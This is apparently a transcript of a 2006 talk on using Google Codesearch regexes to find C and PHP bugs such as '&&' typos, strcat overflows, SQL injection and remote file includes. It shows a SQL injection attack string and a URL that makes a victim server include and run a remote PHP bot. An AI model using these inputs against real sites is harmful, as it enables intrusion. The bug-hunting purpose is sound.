hola a todos, buenas y gracias. hello everyone, i hope all of you are
having a good day, and thank you for coming. my name is jose nazario and
i'll be talking about google codesearch.

the talk will be in English, and i'll take questions and your comments
in #qc.

you can find the slides on my website at
http://monkey.org/~jose/presentations/umeet06/slides/ ...

[slide 1] today's talk is intended to introduce you to google codesearch
and ways that you can use it to find all sorts of programming bugs in
dozens of software applications at once. i'll provide you with a one or
two slide introduction to google codesearch.

also, since i promised google tricks (plural), i'll give you guys one
more that i don't see used often: the dot operator. i found this
accidentally when i was looking for an RPM package once. i found that
"package.rpm" brought up "package, rpm" also. turns out that google
seems to drop punctuation from the index and from your search terms, and
replaces it with the generic "stuff we don't index" filler. so, you can
now join your words in a phrase with the dot and match all sorts of
combinations. compare searching for "foo bar" against "foo.bar" (with
the first still quoted). the quotes enforce a space, but the dot allows
you to have commas or other non-word stuff in there. kind of neat, and
like i said, i don't see people using this often.

[slide 2] a bit about me: i am a senior security and software engineer
at arbor networks in ann arbor, michigan (USA). that basically means i
write software, develop new products and features, and analyze security
incidents, vulnerabilities, and tools all in my job.

i am not employed by google and i do not represent them. keep this in
mind when you're watching this talk. this is not an official google
talk.

[slide 3] ok, google codesearch. as i recall it was launched by google's
"labs" division (where new products come from) in early October 2006,
so just a couple of months ago. codesearch is different than google's
normal search in that it focuses on searching source code on the web.
this includes C, PHP, C++, Java, and of course scripting languages like
python, ruby, and perl. like google, it supports search operators, which
let you control the search inputs. unlike google's basic search,
however, it supports regular expressions. this means we can really dig
into code flexibly. before, if you wanted to search on google for some
source code you had to use the terms and "lang:c" in your input. now,
google codesearch lets you apply patterns to find things more flexibly.

in a nutshell, google's indexed millions of source code files. they've
downloaded them so you don't have to! great if you have ever been curious
about searching for bugs in code, like we'll be doing. far easier than
downloading thousands of source packages, storing them, and grepping
through them.

google codesearch isn't the first code search engine. koders.com has
been around for a while and they have a neat engine. it doesn't appear
to support regular expressions, but it does have many other neat
features. i recently used koders.com to find some BSD licensed code to
include in a tool that i ported from BSD to Linux. these search engines
are great for that sort of thing.

[slide 4] ok, it's a beta of a google product so it'll have some bugs,
that's to be expected. it tends to forget that you want a case sensitive
search once you crawl past the first page, for example. also, its
regular expression engine only applies the pattern to a single line at
a time, and you can't make use of back references (a powerful regex
facility that lets you build up complex queries on the fly). also,
google codesearch doesn't always know what the newest source archive
is, so sometimes you'll find a great bug and it will have been fixed in
a newer version.

all in all, though, not a bad tool to have at your disposal, as you'll
see.

[slide 5] OK, so basics about regular expressions in case you haven't
seen or used them before. regexes are basically a way of expressing text
patterns to match specific characters or ranges of characters. for
example, to match any character you can use the . character; * means
zero or more of the preceding character, and + means one or more of the
preceding character. these can be mixed and matched, of course, such as
.+ to mean one or more of any character. to specify a range, use [x-y]
to denote a
range of characters, such as [A-Za-z] to match all alphabetical
characters.

to negate something, use a negated class like [^x], which matches any
one character except x. sadly, this only works on a single character at
a time (even a negated range like [^a-z] matches just one character), so
you can't use it to exclude a whole word. :-/ you have to escape
characters that have special meaning, like (, ) and . using the
backslash: \. to match a ., or \( to match a (.
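
here is a minimal sketch of those building blocks, using python's re
module as a stand-in for the codesearch regex engine (an assumption, the
two engines are not identical). the sample strings are made up, and
fullmatch() is used so that each pattern has to cover the whole string:

```python
import re

# each entry: (pattern, text, should_match) -- all sample strings are made up
examples = [
    (r"a.c", "abc", True),          # . matches any one character
    (r"ab*c", "ac", True),          # * means zero or more of the preceding b
    (r"ab+c", "ac", False),         # + needs at least one b
    (r".+", "", False),             # one or more of any character
    (r"[A-Za-z]+", "Hello", True),  # a range of characters
    (r"[^x]", "x", False),          # negation: any one character except x
    (r"[^x]", "y", True),
    (r"foo\.h", "fooxh", False),    # \. matches only a literal dot
    (r"foo\.h", "foo.h", True),
    (r"main\(", "main(", True),     # \( matches a literal open parenthesis
]

results = [bool(re.fullmatch(p, t)) for p, t, _ in examples]
for (p, t, expected), got in zip(examples, results):
    print(f"{p!r:12} vs {t!r:8} -> {got}")
```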

see the URL in the page to learn more about regex formats. they're not
that hard to learn, but very complex ones require some practice. because
they're used in so many things in UN*X-land, you should become familiar
with them.

[slide 6] just like normal google searches, you can use special
operators to restrict your search. you can focus on the C language, for
example, using "lang:c" in your search. you can also negate these, or
chain them together:

        foobar lang:(c|c++) -lang:php

you can also restrict by license, using the license: operator. e.g. to get
only GPL files, use license:gpl. google codesearch infers the license
from various files in the source repository.

you can, of course, restrict by filename or by package, using the
operators file: and package:. this basically applies these arguments to
the result set. for example, to match only C header files, use
file:\.h$ (anything ending in .h). you may want to focus on a particular
package, focusing on only a website or a file format, using the package
operator. this one is a lot like "inurl" in a standard google query.

we'll be using some of these operators in our searches to keep our
results focused.
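
to see what the file:\.h$ restriction does, here is a small sketch that
applies the same regex to a list of made-up file names. it assumes the
operator's argument is matched anywhere in the path, which is what the
\.h$ example suggests but is not something i can confirm:

```python
import re

# made-up file names standing in for an indexed source tree
paths = ["src/util.h", "src/util.c", "include/foo.hpp", "README", "lib/a.h.in"]

header_only = re.compile(r"\.h$")  # the argument from file:\.h$
headers = [p for p in paths if header_only.search(p)]
print(headers)
```

the $ anchor is what keeps foo.hpp and a.h.in out of the results.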

[slide 7] a couple of facts about google codesearch, one known and one not so
well known. if your result set has more than one hit, you can use "n" to
browse to the next result (kind of like "n" in a vi search). very handy!
google codesearch highlights the results for you, also very nice.

secondly, google codesearch seems to include some non-software archives
in its index. i found this by accident while searching for my name!
basically, what i found was someone's Linux home directory backup.
because their mozilla cache held some example code that i wrote for a
website, google marked it as a code archive to include. voila, i
found their backup. quite interesting, to say the least. i'm sure other
interesting backups are out there, too.

[slide 8] screen shot showing my results that found a backup in google
codesearch. this is a backup of someone's home directory. my name
appeared in their mozilla cache.

[slide 9] in a nutshell, this is our strategy for finding bugs. it's
based on the basic openbsd philosophy: find a bug, fix it, generalize
the form, find it everywhere, fix it everywhere. for example, when you
find a typo, it's usually not the only one of its kind. fix it, find the
others, and fix them.

what we're going to do here is to identify a bug or some bad
programming practice, and generalize that form into a regular
expression. we'll then apply that regular expression to google
codesearch and then examine the results.
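
the same loop can be sketched locally. this is only a toy model of the
idea, not how google codesearch works inside: search_corpus() and the
two-file corpus are hypothetical, and the "bug" is the typo example from
above (a misspelled "recieve"):

```python
import re

def search_corpus(pattern, corpus):
    """Return (filename, line number, line) for each line the pattern matches."""
    regex = re.compile(pattern)
    hits = []
    for name, text in corpus.items():
        # match one line at a time, like the single-line limit mentioned earlier
        for lineno, line in enumerate(text.splitlines(), start=1):
            if regex.search(line):
                hits.append((name, lineno, line.strip()))
    return hits

# hypothetical corpus: file name -> file contents
corpus = {
    "net.c": "/* recieve a packet */\nint recv_pkt(void);\n",
    "io.c": "/* receive bytes */\n/* recieve more */\n",
}

hits = search_corpus(r"recieve", corpus)
for name, lineno, line in hits:
    print(f"{name}:{lineno}: {line}")
```

every hit still has to be read by a human before it counts as a bug.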

i've found that with a well formed regular expression, about 10% or
more of the search results turn out to be real bugs.

what you should do when you apply this is to ensure that the bug still
exists in the latest version of the code. i often have to visit the
project website, look for the latest released version and possibly the
source repository (SVN or CVS) and see if it's still there. if it is, i
then generate a patch and file a bug. i did this in October for a
variety of projects, including OpenAFS, MPlayer, MySQL, and many others.
i got a bunch of bugs fixed over a single cup of coffee, that's how easy
this can be.

[slide 10] i'll show you four basic bugs here and how we find them in google
codesearch. you'll learn the regular expressions for some common C logic
bugs (at least two of which have real security bug implications), some C
string handling bugs, and two types of common PHP bugs: SQL injection
and file include bugs.

[slide 11] the first set of bugs we'll find in google codesearch are
some logic bugs. specifically, there's a logic bug in C that people
encounter when they make the typo of "&" vs "&&". & is a bitwise AND,
and && is a logical AND. specifically, you use "&" to test for the
presence of a bit in a variable, and "&&" to test that two conditions
are both true (a logical AND).

very often you'll see people building up a set of flags in an integer,
mixing the flags together in a variable "flags". they'll then use
bitwise ANDs to look for specific flags being set, such as FLAG_PROCESS
or FLAG_OLD_INPUT. the test is
    if (flags & FLAG_MINE) { /* do some stuff */ }
the complement of that is to look for two things being true, such as
this:
    if (is_set && process) { /* do more stuff */ }
only if "is_set" and "process" are not 0 or not NULL will that be true.

a common typo is to write && when & was meant.

this is also present in the bitwise vs logical OR ("|" vs "||") and in
the comparison vs assignment operators ("==" vs "=").
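
a quick way to convince yourself of the difference, sketched in python
where "&" is the same bitwise AND and "and" plays the role of C's "&&".
the flag values are hypothetical:

```python
FLAG_PROCESS = 0x01    # hypothetical bit values
FLAG_OLD_INPUT = 0x02

flags = FLAG_PROCESS   # only the PROCESS bit is set

# C: flags & FLAG_OLD_INPUT  -> is that one bit set?
bitwise_test = bool(flags & FLAG_OLD_INPUT)

# C: flags && FLAG_OLD_INPUT -> are both values non-zero?
logical_test = bool(flags and FLAG_OLD_INPUT)

print(bitwise_test, logical_test)
```

the bitwise test says the OLD_INPUT bit is not set, while the logical
test is true simply because both values are non-zero.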

[slide 12] ok, this is what we'll search for:
    flags\ *&&\ *[A-Za-z_]*
this will look for a line where someone has "flags" (a common variable
name) and a logical AND with an identifier, typically a macro name in
upper case letters. this is a common typo in C code. what's funny is that
the compiler treats this as reasonable code, so you won't get a warning
for it! however, if "flags" is not 0 or NULL and the macro is defined as
not 0 or NULL, this condition will always be true. this is bad,
obviously, and not what the programmer intended.
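
to get a feel for what this expression catches, here is a sketch that
runs it over a few made-up C lines with python's re module (standing in
for the codesearch engine, which is an assumption):

```python
import re

pattern = re.compile(r"flags\ *&&\ *[A-Za-z_]*")

# made-up C lines; the comment says whether the pattern should hit
c_lines = [
    "if (flags && FLAG_MINE) {",        # hit: the typo we are hunting
    "if (flags & FLAG_MINE) {",         # no hit: correct bitwise test
    "if (is_set && process) {",         # no hit: no "flags" variable
    "if (flags && ptr != NULL) {",      # hit, but probably legitimate code
    "if (req->flags&&FLAG_OLD_INPUT)",  # hit: the spaces are optional
]

matched = [bool(pattern.search(line)) for line in c_lines]
for line, hit in zip(c_lines, matched):
    print("HIT " if hit else "    ", line)
```

the fourth line is why you still have to read each result: the pattern
cannot tell a macro from an ordinary variable.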

so, let's search google codesearch for this ...

[slide 13] here is an example bug in neon, found and fixed by one of our
interns. the blue highlights the form, and we can infer what the
programmer meant by reading the code. what they meant to do was to see
if the session protocol flags have the AUTH_FLAG_VERIFY_NON40x bit set,
but in this case that part of the test will always evaluate to true. if
the other parts of the condition are true, then we'll see a mistaken
"verify" part get hit.

neon fixed this bug after jon (our intern) filed a report. this bug
prevents the neon DAV component from evaluating the session properly. it
doesn't turn up often, but it is a real bug.

a coworker, aaron campbell, found a doozy of a bug in openssl
certificate checking this way. he filed a bug report and got it fixed in
under an hour. i found several bugs in MySQL, MPlayer, OpenAFS and other
projects like this, and even wound up finding a security bug in OS X
using this expression.

[slide 14] let's look for an old school C bug. this was common about 10
years ago and has been whittled away quickly, but you'll still find it
from time to time. basically what we'll be looking for is the programmer
copying user-supplied input into a buffer without any sanity or length
checking. in this case, we'll look for someone using strcat() (string
concatenation or joining) from a user supplied argument (argv[x]). this
is possibly a reliability bug, and even a security bug in some cases.
this isn't so common anymore, because it's so easy to find, yet people
still do it.

[slide 15] so, this is what we'll search for:
    strcat\ *\(\ *.*\ *,\ *argv lang:c
this looks for strcat followed by 0 or more spaces, then an open
parenthesis, then any characters, then a comma, and then argv (with
optional spaces, "\ *", in there). oh, and we'll restrict ourselves to
the C language.

the problem here is that the destination buffer may not be large enough
to hold the user-supplied input. in fact, strcat() and strcpy() don't do
any length checking, they happily shove all the data from the source
into the dest and if it overflows, so be it. that means the user can
craft the input and trigger a basic buffer overflow.
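
here is a sketch of that expression run over a few made-up C lines,
again with python's re module standing in for the codesearch engine (an
assumption) and without the lang:c operator, which only exists on the
search site:

```python
import re

pattern = re.compile(r"strcat\ *\(\ *.*\ *,\ *argv")

# made-up C lines, one per line of this block
c_source = r'''
strcat(command, argv[i]);
strcat (buf , argv[1]);
strcat(command, " ");
strncat(buf, argv[1], n);
char *strcat(char *dest, const char *src);
'''
c_lines = c_source.strip().splitlines()

matched = [bool(pattern.search(line)) for line in c_lines]
for line, hit in zip(c_lines, matched):
    print("HIT " if hit else "    ", line)
```

only the first two lines hit: the constant string, the bounded strncat()
call, and the libc-style prototype are all skipped.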

[slide 16] ok, it's 2006, and not surprisingly these are uncommon now.
thankfully, too! this is a bug i found while searching for this. we can
see that the buffer "command" gets built as a 10240 byte (10k) buffer,
and for every argument supplied, the command is grown by the next
argument and a space. we may be able to overflow this, i'm not sure the
shell would allow it, but you get the idea. here we have two idioms
mixed that are dangerous: a user-controlled loop (argc controls how many
times it executes) and user supplied input going into a static buffer
unchecked (strcat() from argv).

bad code, and revealed by google codesearch.
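
the arithmetic behind that overflow is simple enough to sketch. this
assumes the buffer starts out empty and that each argument is appended
followed by exactly one space; the helper names and the sample
arguments are hypothetical:

```python
BUF_SIZE = 10240  # size of the "command" buffer described above

def bytes_needed(args):
    """Bytes written if every argument is appended plus one space, plus the NUL."""
    return sum(len(a) + 1 for a in args) + 1

def overflows(args, buf_size=BUF_SIZE):
    """True if the joined arguments would not fit in the buffer."""
    return bytes_needed(args) > buf_size

small = ["ls", "-l", "/tmp"]   # an ordinary command line
large = ["A" * 4000] * 3       # three long arguments

print(bytes_needed(small), overflows(small))
print(bytes_needed(large), overflows(large))
```

nothing in the loop itself stops the total from growing past the buffer;
the only limit is whatever the shell or kernel puts on the command line.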

[slide 17] here are some other basic C bugs you can look for. you can generalize
the argc controlled loop pretty easily by looking for while loops and for
loops including argc. other bug classes you can easily look for are
format string bugs, looking for unformatted arguments to common
functions like printf(), syslog() and the like.

you can also look for overflows in the sprintf() and related functions.
again, look for a user-controlled input.
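
as a rough sketch of what such searches could look like: the two
patterns below are my own guesses written in the same style as the
strcat search, not expressions from the slides, and they are tried
against made-up C lines with python's re module:

```python
import re

# hypothetical patterns: user input passed directly as the format string
printf_pat = re.compile(r"printf\ *\(\ *argv")
syslog_pat = re.compile(r"syslog\ *\(\ *[A-Z_]+\ *,\ *argv")
patterns = [printf_pat, syslog_pat]

# made-up C lines, one per line of this block
c_source = r'''
printf(argv[1]);
printf("%s\n", argv[1]);
syslog(LOG_ERR, argv[1]);
syslog(LOG_ERR, "%s", argv[1]);
fprintf(stderr, argv[1]);
'''
c_lines = c_source.strip().splitlines()

flagged = [any(p.search(line) for p in patterns) for line in c_lines]
for line, hit in zip(c_lines, flagged):
    print("HIT " if hit else "    ", line)
```

the last line is a real format string problem that these two patterns
miss, since fprintf() takes the stream first; each function family needs
its own expression.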

here, because google codesearch isn't allowing for backrefs, you have to
weed these out manually. it's pretty tough to do, and these sorts of
bugs are not very common anymore, either. with backrefs, we could easily
"taint" user supplied variable data and follow it through the code.

[slide 18] so, let's move on to the first of two sets of PHP bug
classes. the first is SQL injection attacks and vulnerabilities. SQL
injection bugs are very common and easily created. basically, they come
from scenarios where developers build up SQL commands using unescaped,
unscrubbed user-supplied input.

there's a link here to show you how to exploit SQL injection bugs. i
won't get into that here, but suffice it to say it's trivial.

[slide 19] so, this is what we'll search for:
    SELECT\ *[^%]\ *$_GET lang:php
this looks for SELECT being followed by a GET parameter reference
without any formatting going on. there's no escaping in many of these
cases, as well.

the results? about 2000 hits on google codesearch. now that's a lot of
bugs!
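
to try the idea locally, here is a sketch with python's re module. two
things are adapted and are my assumptions about the intent: python
treats a bare $ as an end-of-line anchor, so it is escaped as \$, and
the [^%] is given a * so that any run of non-% characters may sit
between SELECT and the GET reference. the PHP lines are made up:

```python
import re

# adapted for python's re: \$ is a literal dollar sign, [^%]* skips any
# run of characters that contains no % format specifier
pattern = re.compile(r"SELECT\ *[^%]*\ *\$_GET")

php_source = r'''
$query = "SELECT * FROM item WHERE ID == '" . $_GET['id'] ."'";
$q = sprintf("SELECT * FROM item WHERE id = %d", $_GET['id']);
$q = "SELECT name FROM users";
$id = intval($_GET['id']);
'''
php_lines = php_source.strip().splitlines()

matched = [bool(pattern.search(line)) for line in php_lines]
for line, hit in zip(php_lines, matched):
    print("HIT " if hit else "    ", line)
```

only the first line hits; the sprintf() version with %d is skipped
because of the [^%] class.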

[slide 20] here's an example, and (so it would fit on the screen) this
one isn't all that high profile. (some of the other projects that had
this are blogging software, CMS software, etc, all sorts of web apps).
here the query string is built from a raw, unprocessed user-supplied
variable:
    $query = "SELECT * FROM item WHERE ID == '" . $_GET['id'] ."'";
"query" references "id" from the user without any stripping of special
SQL characters. there's nothing stopping you from closing that query and
creating a new one (e.g. to call out stored procedures to get shell
access), or modifying it to show all items (e.g. where id = 1 OR id > 0).

this is the basic form of an SQL injection bug, and easy to avoid. lots
of PHP books show you how to avoid this, and this is sadly too common in
PHP code.
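
the same mistake, and the usual fix, can be sketched in python with the
standard sqlite3 module. this is not the PHP code from the slide: the
table contents, the helper names, and the attack string are all made up
for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE item (id TEXT, name TEXT)")
conn.executemany("INSERT INTO item VALUES (?, ?)",
                 [("1", "apple"), ("2", "pear"), ("3", "plum")])

def lookup_unsafe(user_id):
    # same shape as the PHP line: raw input spliced into the SQL text
    query = "SELECT name FROM item WHERE id = '" + user_id + "'"
    return [row[0] for row in conn.execute(query)]

def lookup_safe(user_id):
    # placeholder: the value travels separately from the SQL text
    return [row[0] for row in conn.execute(
        "SELECT name FROM item WHERE id = ?", (user_id,))]

attack = "1' OR '1'='1"   # closes the quote and adds a condition that is always true

print(lookup_unsafe("2"), lookup_safe("2"))
print(sorted(lookup_unsafe(attack)), lookup_safe(attack))
```

with the spliced query the attack string returns every row; with the
placeholder it is just an id that matches nothing.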

[slide 21] while i showed you SELECT for a GET parameter, you will also
want to look for other SQL commands: INSERT, UPDATE, DELETE, and you'll
also want to look for this in POST variables, too (e.g. $_POST['id']).

when you expand this out, lots more bugs, all very similar, appear. :)
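
generating the whole family of searches is mechanical. a small sketch,
keeping the query text exactly as it appears on slide 19 and only
swapping the SQL command and the variable name (the template and list
names are hypothetical):

```python
from itertools import product

# the slide 19 query with the command and the superglobal made variable
template = r"{cmd}\ *[^%]\ *${src} lang:php"

commands = ["SELECT", "INSERT", "UPDATE", "DELETE"]
sources = ["_GET", "_POST"]

queries = [template.format(cmd=cmd, src=src)
           for cmd, src in product(commands, sources)]

for q in queries:
    print(q)
```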

[slide 22] the second type of PHP bug class here is due to remote file
includes. PHP has the "include()" directive which lets you include a
local file. however, PHP also lets you include remote files from another
web server.

here the exploit is to host a malicious PHP file on a website you
control. the exploit then sets the variable passed to include() to that
file's URL. i recently found a bot that can be used in these attacks, called
"pBot". it is designed to be included in PHP remote file include attacks
and works quite well.

[slide 23] so, what should you search for? just like before, look for
the function using an unscrubbed argument:
    include\ *\(\ *\$_GET lang:php
this looks for the PHP include function with an argument from the GET
parameter, and only in PHP files. very straightforward: here the
attacker can control the input directly.
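
here is a sketch of that expression against a few made-up PHP lines,
using python's re module in place of the codesearch engine (an
assumption) and leaving off the lang:php operator:

```python
import re

pattern = re.compile(r"include\ *\(\ *\$_GET")

# made-up PHP lines, one per line of this block
php_source = r'''
include($_GET['page'] . ".php");
include( $_GET["file"] );
include("header.php");
include_once($_GET['p']);
$page = $_GET['page']; include($page);
'''
php_lines = php_source.strip().splitlines()

matched = [bool(pattern.search(line)) for line in php_lines]
for line, hit in zip(php_lines, matched):
    print("HIT " if hit else "    ", line)
```

the last two lines are just as dangerous but do not hit: include_once()
needs its own search, and input that is copied into a variable first
can't be followed with a single-line pattern.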

[slide 24] some real results found in google codesearch: include calls
out to "page", a user supplied variable, and appends .php. what's the
attack look like?

suppose i have a malicious website and a malicious PHP file, like pBot
:). i store it as
    http://monkey.org/~jose/php/pBot.php
so, i attack an installation of this software like this:
    http://victim.com/admin.php?page=http://monkey.org/~jose/php/pBot
the application, and the web server, will now include and run my PHP
code. voila, a simple attack, and we found this in google codesearch.
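
to make the mechanics concrete, here is a sketch that mimics what an
include of a "page" parameter plus ".php" ends up asking for. it is a
python model, not the PHP from the slide: include_target(), is_remote(),
and the "index" default are hypothetical, and the parameter is assumed
to be named "page":

```python
from urllib.parse import urlsplit, parse_qs

def include_target(request_url):
    """Return the string that include($_GET['page'] . ".php") would try to load."""
    params = parse_qs(urlsplit(request_url).query)
    page = params.get("page", ["index"])[0]   # "index" default is hypothetical
    return page + ".php"

def is_remote(target):
    """True if the include target is a URL rather than a local file name."""
    return urlsplit(target).scheme in ("http", "https", "ftp")

normal = include_target("http://victim.com/admin.php?page=users")
attack = include_target(
    "http://victim.com/admin.php?page=http://monkey.org/~jose/php/pBot")

print(normal, is_remote(normal))
print(attack, is_remote(attack))
```

the appended ".php" does not help the victim at all: it just completes
the attacker's URL.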

[slide 25] i showed you how to use the GET variable, and you should also
look for PHP using untrustworthy input from cookies, POST variables, and
anything else the user can supply, such as hostnames. you can find
cross site scripting bugs this way, too, by looking for user-supplied
input being used without any treatment.

the PHP docs have excellent discussions on secure programming idioms, by
the way, so if you code in PHP, make sure you follow those!

[slide 26] ok, so i showed you four basic bug classes and how to find
them in google codesearch. there are some obvious limits to using google
codesearch for your code audits.

first, you still have to read the code. you still have to follow the
logic and see if it's a real bug, and you still have to understand the
code and any implications it has.

you still have to make sure it's the latest version of the code before
you fire off a bug report.

you have to tune your regular expressions to keep the false positives
down. compare searches for "strcat" vs strcat\ *\(\ *.*\ *,\ *argv. the
former will find lots of basic libc definitions of strcat, the latter
will find real uses of it.

google codesearch is basically grep on steroids (in terms of speed and
quantity of input, but it is missing backrefs), and it will only find
single line bugs. you won't find many of the truly clever bugs this way.

however, i found at least two security bugs like this in just one
morning, over one cup of coffee: one in OS X (CVE-2006-4410) and one in
another project i won't name here because the bug (and security hole) is
still active. coworkers aaron and jon found two more security bugs in a
matter of minutes.

[slide 27] to sum it up, google codesearch is pretty nifty, and a lot
easier than trying to download all sorts of code and screening it
locally. believe me, i've done that!

however, it doesn't support the google web service API yet, and it
doesn't appear to be included in any IDE tools yet (like Koders is). i
imagine this will happen in time.

[slide 28] some more links for you to read. the first is from a
coworker, aaron, and he gives some searches you can look at and explains
how they work, and the bugs they yield. a very great post! aaron's an
awesome hacker and a great coworker at arbor.

the second and third are posts by me discussing codesearch and giving some
basic insecurity statistics using it.

the fourth is a post from the securiteam blog giving more searches and
their results. lots more fun lurking in google codesearch, that's for
sure.

[slide 29] finally, again, this was all started by a morning IRC
conversation with my arbor colleague aaron campbell. we wasted a good
morning futzing around, finding bugs, and aaron found a nifty openssl
0.9.8 bug in a matter of minutes. make sure you read his blog posting.

thank you all for your time and attention, i hope you have found this to
be fun and interesting.